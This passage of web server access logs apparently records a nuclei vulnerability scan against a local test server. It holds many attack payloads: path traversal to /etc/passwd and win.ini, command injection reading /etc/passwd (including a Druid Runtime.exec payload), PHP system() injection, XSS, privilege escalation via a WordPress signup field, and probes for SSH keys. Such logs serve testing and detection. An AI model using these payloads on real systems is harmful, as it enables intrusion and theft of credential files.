"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wlsecurity.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x0D\x0A\x22type\x22:\x22index\x22,\x0D\x0A\x22spec\x22:{\x0D\x0A \x22ioConfig\x22:{\x0D\x0A \x22type\x22:\x22index\x22,\x0D\x0A \x22firehose\x22:{\x0D\x0A \x22type\x22:\x22local\x22,\x0D\x0A \x22baseDir\x22:\x22/etc\x22,\x0D\x0A \x22filter\x22:\x22passwd\x22\x0D\x0A }\x0D\x0A },\x0D\x0A \x22dataSchema\x22:{\x0D\x0A \x22dataSource\x22:\x22odgjxrrrePz\x22,\x0D\x0A \x22parser\x22:{\x0D\x0A \x22parseSpec\x22:{\x0D\x0A \x22format\x22:\x22javascript\x22,\x0D\x0A \x22timestampSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22dimensionsSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22function\x22:\x22function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\x5C\x22/bin/sh`@~-c`@~cat /etc/passwd\x5C\x22.split(\x5C\x22`@~\x5C\x22)).getInputStream()).useDelimiter(\x5C\x22\x5C\x5CA\x5C\x22).next();return {timestamp:\x5C\x224137368\x5C\x22,OQtGXcxBVQVL: hTVCCerYZ}}\x22,\x0D\x0A \x22\x22:{\x0D\x0A \x22enabled\x22:\x22true\x22\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A},\x0D\x0A\x22samplerConfig\x22:{\x0D\x0A \x22numRows\x22:10\x0D\x0A}\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22username\x22:\x22nuclei_29KFpW0tMcGal6u0pjGk0m5sxqz\x22,\x22password\x22:\x2229KFpSG46AC3FwtKKntdqY0KqDQ\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A29KFpS74UsGLFtVnvyaaV83Cthw\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A29KFpS74UsGLFtVnvyaaV83Cthw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A29KFpS74UsGLFtVnvyaaV83Cthw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A29KFpS74UsGLFtVnvyaaV83Cthw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A29KFpS74UsGLFtVnvyaaV83Cthw@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ 